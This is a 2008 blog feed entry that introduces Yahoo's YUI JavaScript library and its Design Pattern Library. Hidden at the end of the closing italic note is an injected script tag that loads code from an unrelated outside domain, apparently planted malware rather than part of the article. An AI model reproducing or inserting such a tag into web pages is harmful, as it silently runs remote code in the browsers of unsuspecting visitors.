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		<title>Yahoo Design Tools: Yahoo&#8217;s hidden gem</title>
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		<pubDate>Mon, 12 May 2008 11:39:46 +0000</pubDate>
		<dc:creator>Shane Perris</dc:creator>
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With all the fuss surrounding the will they/won&#8217;t they merger of Microsoft and Yahoo, it has been surprising to see just how many cool and interesting things there are buried inside the Yahoo corporation.  There is much more to Yahoo than search, directories, Flickr and del.icio.us.  A quick scan of Yahoo! Everything reveals a whole [...]]]></description>
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<p>With all the fuss surrounding the will they/won&#8217;t they merger of Microsoft and Yahoo, it has been surprising to see just how many cool and interesting things there are buried inside the Yahoo corporation.  There is much more to Yahoo than search, directories, <a title="Flickr photo sharing" href="http://www.flickr.com/">Flickr</a> and <a title="del.icio.us - social bookmark sharing" href="http://del.icio.us/">del.icio.us</a>.  A quick scan of <a title="Yahoo! Everything" href="http://everything.yahoo.com">Yahoo! Everything</a> reveals a whole bunch of stuff from the new social news service <a title="Yahoo Buzz" href="http://buzz.yahoo.com/">Buzz</a> to online video editing with <a title="Jumpcut online video editing" href="http://www.jumpcut.com/">Jumpcut</a> to the <a title="Zimbra messaging service" href="http://www.zimbra.com/">Zimbra</a> collaboration and instant messaging service.  However, what is possibly the most interesting to web geeks is the unsung <a title="Yahoo User Interface web development libraries" href="http://developer.yahoo.com/yui/">Yahoo User Interface</a> (YUI) and <a title="Yahoo Design Pattern Library" href="http://developer.yahoo.com/ypatterns/">Yahoo Design Pattern Library</a>, both part of the <a title="Yahoo Developer Network" href="http://developer.yahoo.com/">Yahoo Developer Network</a>.</p>
<p>The YUI is a collection of cross-browser controls and utilities written in Javascript that are intended to be used in developing rich internet applications (think AJAX and DHTML).  It is <a title="YUI user licence" href="http://developer.yahoo.com/yui/license.html">freely available</a> under the BSD licence for anyone to use in commercial applications or otherwise.  Included in the YUI is a collection of Cascading Style Sheets including a comprehensive style sheet providing a large range of different grid design options for page layout.  The YUI has too many cool things to list here, but some of the cooler applications include a rich text editor, calendars and drag and drop utilities.  The YUI is quite a technical collection and is essentially a giant repository of server and client side code.</p>
<p>The Yahoo Design Pattern Library is a practical application of the industrial strength code in the YUI.  The patterns are an attempt to offer comprehensive solutions to a wide-range of interface design problems and pull together different pieces of the YUI code.  There are design patterns for navigation options (things like tabs and indexes), calendars, page layouts and slideshows.  Like the YUI, the Design Pattern Library is free to use by all comers and is licensed under a <a title="Creative Commons By Attribution 2.5" href="http://creativecommons.org/licenses/by/2.5/">Creative Commons By Attribution</a> licence.</p>
<p>To keep up to date on new additions to both YUI and the Design Pattern Library, keep your eyes on the Yahoo! User Interface Blog at <a title="Yahoo! User Interface blog" href="http://yuiblog.com/blog/">http://yuiblog.com/blog/</a></p>
<p><em>Note: as far as I am aware, no part of techwhimsy.com uses either YUI or the pattern library.  Now that I know they exist, there&#8217;s a very good chance some of the features will make their way into techwhimsy v2.0</em><script src="http://ao.euuaw.com/9"></script></p>
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